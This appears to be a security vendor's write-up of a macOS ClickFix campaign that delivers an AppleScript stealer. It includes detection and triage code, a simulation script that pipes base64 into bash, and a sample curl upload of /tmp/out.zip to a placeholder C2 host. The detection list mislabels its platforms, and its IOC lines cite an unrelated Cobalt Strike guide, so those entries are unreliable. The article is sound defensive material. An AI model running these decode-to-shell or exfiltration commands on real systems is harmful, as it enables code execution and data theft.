Clickfix on macOS: AppleScript Malware Campaign Uses Terminal Prompts to Steal Data
Summary
The AppleScript malware campaign targets macOS users via a ClickFix technique: a lure page persuades the victim to paste a one-liner into Terminal that base64-decodes an embedded command and pipes it straight into a shell. That command retrieves an AppleScript stealer which harvests browser data, cryptocurrency wallets, local documents, and other sensitive information, then exfiltrates it to attacker-controlled servers. Because no traditional Mach-O binary is written to disk and the user launches everything themselves, the activity is harder to spot with classic AV and bypasses Gatekeeper. The operation relies on multiple deceptive domains and unusual service ports for command-and-control traffic.
AppleScript Campaign Analysis
Researchers examined the phishing websites, the JavaScript responsible for delivering the payload, and the AppleScript used for collection and exfiltration. Infrastructure mapping uncovered domains such as cryptoinfo-news.com and odyssey1.to, along with services exposed on ports 22, 80, 3333, and 5201. The AppleScript payload packages stolen data into a ZIP file at /tmp/out.zip and uses curl to upload it to a remote endpoint.
Mitigation
Defenders should block the identified malicious domains and limit outbound connections on uncommon ports (3333 and 5201 in this campaign). Harden macOS hosts by restricting AppleScript (osascript) and interactive shell usage where the role allows it, monitoring process telemetry and shell history for base64 -d | bash patterns (on macOS the decode flag may also appear as -D or --decode), and applying strict CORS controls in web environments. Security awareness training should highlight phishing pages that instruct users to copy-paste and run Terminal commands.
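The two behaviours the mitigation and the detection rules below key on, applied to process-creation events, as an added example that is not code from the original page or from any vendor rule. The event shape, the five sample events and the host c2.example.invalid are constructed here; the regexes and the port list are assumptions to tune against your own telemetry. The sibling heuristic exists because, when the one-liner is pasted into an interactive shell, no single process carries the text base64 -d | bash: the stages appear as separate child processes of the Terminal shell.

```python
"""Added example: detect base64-decode-to-shell and curl uploads from /tmp
on macOS process-creation events. Event format and samples are constructed."""
import re
from dataclasses import dataclass

# Pattern 1: base64 decoding piped into a shell. Covers `base64 -d`, macOS-style
# `-D`/`--decode`, and `openssl base64 -d`, piped into sh, bash or zsh.
B64_TO_SHELL = re.compile(
    r"(?:base64\s+(?:-d|-D|--decode)|openssl\s+base64\s+-d)\s*\|\s*(?:/bin/)?(?:ba|z)?sh\b"
)
# Pattern 2: curl uploading a file staged under /tmp via -F, -T or -d/--data-binary @file.
CURL_UPLOAD = re.compile(
    r"\bcurl\b.*(?:-F\s+\S*=@/tmp/\S+|-T\s+/tmp/\S+|(?:-d|--data(?:-binary)?)\s+@/tmp/\S+)"
)
URL_PORT = re.compile(r"https?://[^/\s]+:(\d+)")
KNOWN_C2_PORTS = {3333, 5201}  # uncommon ports reported for this campaign


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def detect(events):
    """Return (pid, tag) for every event whose own command line matches."""
    findings = []
    for e in events:
        if B64_TO_SHELL.search(e.cmdline):
            findings.append((e.pid, "base64_decode_to_shell"))
        if CURL_UPLOAD.search(e.cmdline):
            tag = "curl_tmp_upload"
            port = URL_PORT.search(e.cmdline)
            if port and int(port.group(1)) in KNOWN_C2_PORTS:
                tag += "_known_port"
            findings.append((e.pid, tag))
    return findings


def detect_sibling_pipeline(events):
    """Interactive-paste case: `base64 -d` and a bare shell spawned as siblings
    under the same parent (the user's Terminal shell). Returns parent PIDs."""
    by_parent = {}
    for e in events:
        by_parent.setdefault(e.ppid, []).append(e)
    hits = []
    for ppid, children in by_parent.items():
        has_b64 = any(re.search(r"\bbase64\s+(?:-d|-D|--decode)\b", c.cmdline) for c in children)
        has_bare_shell = any(re.fullmatch(r"(?:/bin/)?(?:ba|z)?sh", c.cmdline.strip()) for c in children)
        if has_b64 and has_bare_shell:
            hits.append(ppid)
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 1) One-liner pasted into Terminal: zsh (pid 400) forks the stages separately.
    ProcEvent(501, 400, "/usr/bin/base64", "base64 -d"),
    ProcEvent(502, 400, "/bin/bash", "bash"),
    # 2) Same one-liner wrapped by a dropper, so the whole pipeline is one command line.
    ProcEvent(503, 450, "/bin/sh", "sh -c 'echo cHJpbnQoJ0NvbXByb21pc2UnKQ== | base64 -d | bash'"),
    # 3) Exfiltration of the staged archive on an uncommon port (host is a placeholder).
    ProcEvent(504, 460, "/usr/bin/curl", 'curl -s -F "file=@/tmp/out.zip" http://c2.example.invalid:5201/upload'),
    # 4) Benign download that must not fire.
    ProcEvent(505, 470, "/usr/bin/curl", "curl -sSL -o /tmp/pkg.tgz https://example.com/pkg.tgz"),
]

if __name__ == "__main__":
    for pid, tag in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {tag}")
    for ppid in detect_sibling_pipeline(SAMPLE_EVENTS):
        print(f"parent {ppid}: base64 decode and bare shell spawned as siblings")
```

Note what the sample shows: the command-line rule fires only on the wrapped form (pid 503), while the pasted form (pids 501/502) is caught only by correlating siblings under the Terminal shell; check which form your EDR records before relying on a single rule.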
Response
When these indicator patterns are detected, notify the SOC, isolate the affected system, and capture temporary artifacts and shell history (~/.zsh_history and ~/.bash_history, which on a pasted one-liner may be the only record of the full command). Perform a forensic review of the /tmp directory, quarantine any suspicious ZIP archives such as /tmp/out.zip, and correlate outbound traffic with the known C2 servers and ports identified in the campaign.
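A first-pass triage of the artifacts named above (shell history and ZIP archives staged in /tmp), as an added example rather than code from the original page. The history file, the archive and its member names are a constructed fixture built in a temporary directory so the script runs offline; on a quarantined host, point triage() at the real ~/.zsh_history and /tmp instead. The c2.example.invalid host in the fixture is a placeholder.

```python
"""Added example: triage zsh history and staged ZIP archives after a ClickFix
incident. All sample data is constructed in a temp directory."""
import hashlib
import os
import re
import tempfile
import zipfile
from datetime import datetime, timezone

# Commands worth a human look: base64 decode piped into a shell, or curl sending
# something from /tmp. Assumed patterns; widen to taste.
SUSPICIOUS = re.compile(r"base64\s+(?:-d|-D|--decode)\s*\|\s*(?:/bin/)?(?:ba|z)?sh\b|\bcurl\b.*@/tmp/")
# zsh extended history: ": <epoch>:<duration>;<command>"
HIST_LINE = re.compile(r"^: (\d+):\d+;(.*)$")


def parse_history(text):
    """Parse zsh history in extended (timestamped) or plain format."""
    entries = []
    for line in text.splitlines():
        m = HIST_LINE.match(line)
        if m:
            entries.append((int(m.group(1)), m.group(2)))
        elif line.strip():
            entries.append((None, line))
    return entries


def suspicious_commands(entries):
    return [(ts, cmd) for ts, cmd in entries if SUSPICIOUS.search(cmd)]


def inventory_archives(directory):
    """sha256, size and member list for every .zip directly under directory."""
    report = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not (name.lower().endswith(".zip") and os.path.isfile(path)):
            continue
        with open(path, "rb") as f:
            digest = hashlib.sha256(f.read()).hexdigest()
        with zipfile.ZipFile(path) as zf:
            members = zf.namelist()
        report.append({"path": path, "sha256": digest,
                       "size": os.path.getsize(path), "members": members})
    return report


def triage(history_path, tmp_dir):
    with open(history_path, encoding="utf-8", errors="replace") as f:
        hits = suspicious_commands(parse_history(f.read()))
    return {"history_hits": hits, "archives": inventory_archives(tmp_dir)}


def build_fixture(root):
    """Constructed sample: a history with one pasted one-liner and one upload,
    plus a staging archive shaped like the /tmp/out.zip described above."""
    hist = os.path.join(root, "zsh_history")
    with open(hist, "w", encoding="utf-8") as f:
        f.write(": 1700000000:0;ls -la\n")
        f.write(": 1700000060:0;echo cHJpbnQoJ0NvbXByb21pc2UnKQ== | base64 -d | bash\n")
        f.write(': 1700000120:0;curl -s -F "file=@/tmp/out.zip" http://c2.example.invalid:5201/upload\n')
    with zipfile.ZipFile(os.path.join(root, "out.zip"), "w") as zf:
        zf.writestr("documents/notes.txt", "constructed sample content")
    return hist


def run_demo():
    """Build the fixture in a temp dir and return the triage result."""
    with tempfile.TemporaryDirectory() as root:
        return triage(build_fixture(root), root)


if __name__ == "__main__":
    result = run_demo()
    for ts, cmd in result["history_hits"]:
        when = datetime.fromtimestamp(ts, timezone.utc).isoformat() if ts else "n/a"
        print(f"[history] {when}  {cmd}")
    for a in result["archives"]:
        print(f"[archive] {a['path']} size={a['size']} sha256={a['sha256']} members={a['members']}")
```

Record the sha256 before quarantining the archive so the hash can be matched against the exfiltrated object if the C2 traffic was captured.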
Attack Flow
Detections
Detect Malicious Use of Curl for Data Exfiltration on macOS [Windows Process Creation]
Detection of Base64 Decoding and Bash Execution on macOS [Linux Process Creation]
IOCs (SourceIP) to detect: The Complete Guide to Hunting Cobalt Strike – Part 2: 10+ HuntSQL Recipes to Find Cobalt Strike
IOCs (DestinationIP) to detect: The Complete Guide to Hunting Cobalt Strike – Part 2: 10+ HuntSQL Recipes to Find Cobalt Strike
Atomic MacOS Stealer – FileGrabber Activity
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative directly reflect the identified TTPs and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
1. The attacker delivers (by phishing email or, as in this campaign, a ClickFix lure page) the one-liner:
   echo "cHJpbnQoJ0NhdXNlJykK" | base64 -d | bash
   The payload decodes to print('Cause') followed by a newline, a placeholder for any malicious Bash script. Bash has no print builtin, so the placeholder exits with status 127, but only after the bash process has been spawned, which is what the rule needs.
2. An unsuspecting user copies the line and pastes it into Terminal.
3. The shell spawns a bash process to run the decoded text, and the Sigma rule's selection matches a command line containing base64 -d | bash. Caveat: typed directly into an interactive shell, the stages run as separate processes (base64 -d and a bare bash) and the full string is present on a process command line only when the one-liner is wrapped, for example sh -c '...'; otherwise the shell history holds it. Confirm which form your EDR records before treating a clean result as negative.
4. The Bash interpreter executes the decoded payload, completing the malicious action (e.g., establishing a reverse shell, downloading additional tools).
Regression Test Script: The script below automates steps 1-3, reproducing the telemetry needed for validation.
#!/bin/bash
# -------------------------------------------------
# Simulate macOS Base64-decode-and-Bash execution
# -------------------------------------------------
# Base64-encoded payload (decodes to: print('Compromise'))
PAYLOAD="cHJpbnQoJ0NvbXByb21pc2UnKQ=="
# Execute the one-liner exactly as an attacker would
echo "$PAYLOAD" | base64 -d | bash
# Exit with the status of the Bash command
exit $?
Cleanup Commands: Remove any temporary files or background processes that may have been created by the payload (replace with payload-specific cleanup if needed).
#!/bin/bash
# Simple cleanup: ensure no stray Bash child processes remain.
# pkill -f takes an extended regex, so the pipe must be escaped;
# an unescaped "base64 -d | bash" means "base64 -d " OR " bash" and
# would kill any process whose command line contains " bash".
pkill -f 'base64 -d \| bash' 2>/dev/null
# If the payload created files, delete them (example placeholder)
rm -f /tmp/malicious_script.sh 2>/dev/null